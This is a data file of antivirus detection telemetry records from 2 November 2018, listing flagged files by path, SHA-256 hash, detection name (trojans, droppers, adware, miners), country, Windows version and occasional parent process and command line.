  Row(detection=Row(filename='dialog.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\plugins\\dialog\\dialog.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094837-021153f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1aadc79c\\AVSCAN-20181102-094759-FA32F8C5\\AVSCAN-20181102-094837-021153F1', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T15:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D88B04B4BC6AE15EF14B0E49C9B9673E3696FFC344533066BBE116EE15FFC48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webbooster@iminent.com.xpi', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Datos antiguos de Firefox\\jykvzqpm.default-1372182658215\\Extensions\\webbooster@iminent.com.xpi', filesize=612000, name='Adware/Iminent.qua.#M1.#R1'), hash='080658eab8e145bf98fe4ca8ce442937c4cbefed0973abb2d60146390f2588e7', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upgrade.exe', filepath='g:\\recycler\\s-1-5-21-1708537768-688789844-1417001333-1003\\dg2\\Upgrade.exe', filesize=384000, name='W32/Ramnit.CD.#M1.#R1'), hash='444c247436674c43fc4f582f05f8e368cf4300b2600839321e7c17206e9c8772', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:46:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180913-924b565a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-180913-924B565A', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1ABC6468BCB64CF4DE3DE544A6035B6C41B2F47C1BCB5BAD554FAEBAC0E6CB9F', filesize=2240000, name='TR/Taranis.3013.#M1.#R1'), hash='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1ABC6468BCB64CF4DE3DE544A6035B6C41B2F47C1BCB5BAD554FAEBAC0E6CB9F', filesize=2240000, name='TR/Taranis.3013.#M1.#R1'), hash='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194025-416d4ff5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194025-416D4FF5', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2C9F9E2D93243FFF2D209FB9BECE4CC53C703688686962D69B3067C6546A729A', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055224-7118f5b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055224-7118F5B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052857-2a6c94e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052857-2A6C94E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122503-8fce8677', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122503-8FCE8677', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050250-84865c58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050250-84865C58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061353-71503b99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061353-71503B99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f78', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f78', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053242-b078d4ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053242-B078D4ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061254-4e907d32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061254-4E907D32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164444-f48eafea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e64cb28\\AVSCAN-20181102-162959-7940ACA9\\AVSCAN-20181102-164444-F48EAFEA', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:44:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181228-53630584', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e11a6c\\AVSCAN-20181102-181154-4ECE569E\\AVSCAN-20181102-181228-53630584', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:12:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122459-8f250a86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122459-8F250A86', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053146-8f69cc25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053146-8F69CC25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050721-262c2c5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050721-262C2C5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tempsbe.bat', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempSBE\\TempSBE.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134111-e0a557ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134111-E0A557CA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061935-3d8c7389', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061935-3D8C7389', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.981\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.981\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:10:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153243-bc019ad5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153243-BC019AD5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061500-993ea6f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061500-993EA6F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111407-c041790f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b23e90e\\AVSCAN-20181102-111220-B3D705DB\\AVSCAN-20181102-111407-C041790F', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:14:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061113-121fe1a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061113-121FE1A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:12Z'), dt=datetime.date(2018, 11, 2)),
